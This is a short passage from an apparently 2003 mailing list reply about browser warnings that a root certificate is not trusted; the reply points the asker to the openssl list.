> all pop up warning dialogues saying the root is not trusted.
If you don't get a reply here, try on the openssl list, where there's likely
to be much more expertise with handling certs. But we'd be interested in
hearing any resolution you find.
Last updated on 23 Sep 2003 by Pensive Mailing List Admin